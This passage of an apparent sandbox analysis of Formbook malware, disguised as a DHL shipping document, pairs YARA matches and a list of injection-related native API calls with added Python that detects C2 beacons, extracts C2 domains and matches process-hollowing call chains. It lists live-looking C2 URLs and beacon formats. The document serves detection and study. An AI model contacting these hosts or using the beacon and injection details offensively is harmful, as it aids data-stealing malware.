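BENIGN_GET = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"

# Transcribed memory strings: adjacent C2 entries glued to the marker,
# plus one plain URL of the other form the report lists.
CONFIG_STRINGS = [
    "http://www.363ww.topwww.rw-bau.comF7L99l=8qpwJ",
    "http://www.espisys-technology.comwww.on-smooth.comF7L99l=8qpwJ)",
    "http://www.vanguardfsm.comwww.xefordbienhoa.comF7L99l=8qpwJr",
    "http://www.getpay.life/d2a3/",
]


def parse_request(raw):
    """Split a CRLF-delimited HTTP/1.1 request into method, target, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def raw_params(query):
    """Split the query WITHOUT percent-decoding: the blob is raw base64 with
    unescaped '+' and '/', which parse_qsl would turn into spaces."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def is_formbook_beacon(raw):
    """Short /xxxx/ path and 'Connection: close', plus either a GET with no
    User-Agent and a two-parameter query holding exactly one long base64 blob,
    or a form POST whose Origin/Referer merely echo the Host."""
    method, target, h, _ = parse_request(raw)
    url = urlsplit(target)
    if not PATH_RE.match(url.path) or h.get("connection", "").lower() != "close":
        return False
    host = h.get("host", "")
    if method == "GET":
        params = raw_params(url.query)
        blobs = [v for v in params.values() if B64_RE.match(v)]
        return "user-agent" not in h and len(params) == 2 and len(blobs) == 1
    if method == "POST":
        return (h.get("content-type", "").startswith("application/x-www-form-urlencoded")
                and h.get("origin") == "http://" + host
                and h.get("referer") == "http://" + host + url.path)
    return False


def c2_domains(strings, marker=MARKER):
    """Unique C2 hosts, in order of first appearance, from strings shaped like
    'http://www.a.comwww.b.com<marker>' or 'http://host/path'."""
    found = []
    for s in strings:
        if s.startswith("http://"):
            s = s[len("http://"):]
        s = s.split(marker)[0].split("/")[0]
        for host in re.split(r"(?=www\.)", s):   # cut where each 'www.' begins
            if host and host not in found:
                found.append(host)
    return found


if __name__ == "__main__":
    for name, req in [("GET", BEACON_GET), ("POST", BEACON_POST), ("benign", BENIGN_GET)]:
        print(f"{name:6s} beacon={is_formbook_beacon(req)}")
    print("C2 hosts:", ", ".join(c2_domains(CONFIG_STRINGS)))
```

The GET heuristic deliberately keys on the absence of a User-Agent and the two-parameter query rather than on the literal /d2a3/ path or the F7L99l marker, because those two values are per-build; in a detection pipeline, feed the recovered host list to DNS and proxy logs, since each 404 above shows the sample rotating to the next host rather than giving up.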

E-Banking Fraud

Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: initial sample Static PE information: Filename: DHL_SHIPPING_DOCUMENT.exe
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00410371 1_2_00410371
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00403873 3_2_00403873
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00421964 3_2_00421964
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00401B50 3_2_00401B50
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004055CA 3_2_004055CA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004055D3 3_2_004055D3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00420583 3_2_00420583
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0042163A 3_2_0042163A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0042163D 3_2_0042163D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040BF6F 3_2_0040BF6F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040BF73 3_2_0040BF73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00421F29 3_2_00421F29
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004017C0 3_2_004017C0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004057F3 3_2_004057F3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004017B1 3_2_004017B1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF20A8 3_2_00AF20A8
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B090 3_2_00A3B090
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1002 3_2_00AE1002
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2F900 3_2_00A2F900
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF22AE 3_2_00AF22AE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5EBB0 3_2_00A5EBB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEDBD2 3_2_00AEDBD2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF2B28 3_2_00AF2B28
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3841F 3_2_00A3841F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3D5E0 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A20D20 3_2_00A20D20
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF2D07 3_2_00AF2D07
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF1D55 3_2_00AF1D55
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF2EF7 3_2_00AF2EF7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A46E30 3_2_00A46E30
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF1FF1 3_2_00AF1FF1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: String function: 004019C0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: String function: 00A2B150 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E4A3 NtCreateFile, 3_2_0041E4A3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E553 NtReadFile, 3_2_0041E553
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E5D3 NtClose, 3_2_0041E5D3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E683 NtAllocateVirtualMemory, 3_2_0041E683
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E4F5 NtReadFile, 3_2_0041E4F5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E49E NtCreateFile, 3_2_0041E49E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E5CD NtClose, 3_2_0041E5CD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E5FF NtClose, 3_2_0041E5FF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E59D NtClose, 3_2_0041E59D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E67D NtAllocateVirtualMemory, 3_2_0041E67D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A698F0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A69860
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69840 NtDelayExecution,LdrInitializeThunk, 3_2_00A69840
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A699A0 NtCreateSection,LdrInitializeThunk, 3_2_00A699A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A69910
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A20 NtResumeThread,LdrInitializeThunk, 3_2_00A69A20
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A69A00
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A50 NtCreateFile,LdrInitializeThunk, 3_2_00A69A50
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A695D0 NtClose,LdrInitializeThunk, 3_2_00A695D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69540 NtReadFile,LdrInitializeThunk, 3_2_00A69540
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A696E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A69660
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A697A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A69780
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A69FE0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A69710
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A698A0 NtWriteVirtualMemory, 3_2_00A698A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69820 NtEnumerateKey, 3_2_00A69820
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6B040 NtSuspendThread, 3_2_00A6B040
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A699D0 NtCreateProcessEx, 3_2_00A699D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69950 NtQueueApcThread, 3_2_00A69950
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A80 NtOpenDirectoryObject, 3_2_00A69A80
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A10 NtQuerySection, 3_2_00A69A10
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6A3B0 NtGetContextThread, 3_2_00A6A3B0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69B00 NtSetValueKey, 3_2_00A69B00
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A695F0 NtQueryInformationFile, 3_2_00A695F0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69520 NtWaitForSingleObject, 3_2_00A69520
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6AD30 NtSetContextThread, 3_2_00A6AD30
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69560 NtWriteFile, 3_2_00A69560
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A696D0 NtCreateKey, 3_2_00A696D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69610 NtEnumerateValueKey, 3_2_00A69610
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69670 NtQueryInformationProcess, 3_2_00A69670
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69650 NtQueryValueKey, 3_2_00A69650
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69730 NtQueryVirtualMemory, 3_2_00A69730
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6A710 NtOpenProcessToken, 3_2_00A6A710
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69760 NtOpenProcess, 3_2_00A69760
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69770 NtSetInformationFile, 3_2_00A69770
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6A770 NtOpenThread, 3_2_00A6A770
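The native calls listed above for eixfhzlwqd.exe (NtCreateProcessEx, NtUnmapViewOfSection, NtCreateSection, NtMapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread, NtResumeThread) are the building blocks of the process hollowing and APC injection the report flags. The Python below is an added example, not the sandbox's own logic. It takes a per-process call trace (constructed here, modelled on the API set above) and checks whether the calls form an ordered injection chain, because the order, not the presence of any single API, is what separates an injector from a debugger or a loader that also writes memory. The stage names, the required/optional split and the technique labels are assumptions.

```python
"""Ordered native-API chain matching for process hollowing / injection (added example)."""
from collections import defaultdict

# Ordered stages of an injection chain. Each stage lists the NT APIs that can
# satisfy it. Required stages must occur in this order; optional ones count only
# if they fall between the surrounding required stages.
STAGES = [
    ("target",   {"NtCreateProcessEx", "NtCreateUserProcess", "NtOpenProcess"}, True),
    ("unmap",    {"NtUnmapViewOfSection"}, False),
    ("prepare",  {"NtAllocateVirtualMemory", "NtCreateSection", "NtMapViewOfSection"}, False),
    ("write",    {"NtWriteVirtualMemory"}, True),
    ("redirect", {"NtSetContextThread", "NtQueueApcThread"}, True),
    ("resume",   {"NtResumeThread"}, False),
]

# Constructed trace of (pid, api) tuples. pid 3 mirrors the call set the report
# lists for eixfhzlwqd.exe; pid 7 is an APC injection into an already running
# process; pid 9 is benign file I/O; pid 11 has the right APIs in the wrong order.
SAMPLE_TRACE = [
    (3, "NtCreateFile"), (3, "NtReadFile"), (3, "NtClose"), (3, "NtAllocateVirtualMemory"),
    (3, "NtCreateProcessEx"), (3, "NtUnmapViewOfSection"), (3, "NtCreateSection"),
    (3, "NtMapViewOfSection"), (3, "NtWriteVirtualMemory"), (3, "NtGetContextThread"),
    (3, "NtSetContextThread"), (3, "NtResumeThread"),
    (7, "NtOpenProcess"), (7, "NtAllocateVirtualMemory"), (7, "NtWriteVirtualMemory"),
    (7, "NtOpenThread"), (7, "NtQueueApcThread"),
    (9, "NtCreateFile"), (9, "NtAllocateVirtualMemory"), (9, "NtWriteFile"),
    (9, "NtQueryInformationProcess"), (9, "NtClose"),
    (11, "NtWriteVirtualMemory"), (11, "NtCreateProcessEx"), (11, "NtResumeThread"),
]


def first_index(calls, apis, lo, hi):
    """Index of the first call in calls[lo:hi] that belongs to apis, else None."""
    return next((i for i in range(lo, hi) if calls[i] in apis), None)


def match_chain(calls):
    """Greedy ordered-subsequence match of STAGES against one process's calls.
    Returns ({stage: api}, complete); complete means every required stage was hit in order."""
    matched, positions, pos = {}, {}, 0
    for k, (name, apis, required) in enumerate(STAGES):
        if not required:
            continue
        hit = first_index(calls, apis, pos, len(calls))
        if hit is None:
            return matched, False      # required stage absent or out of order: chain broken
        matched[name], positions[k], pos = calls[hit], hit, hit + 1
    for k, (name, apis, required) in enumerate(STAGES):
        if required:
            continue
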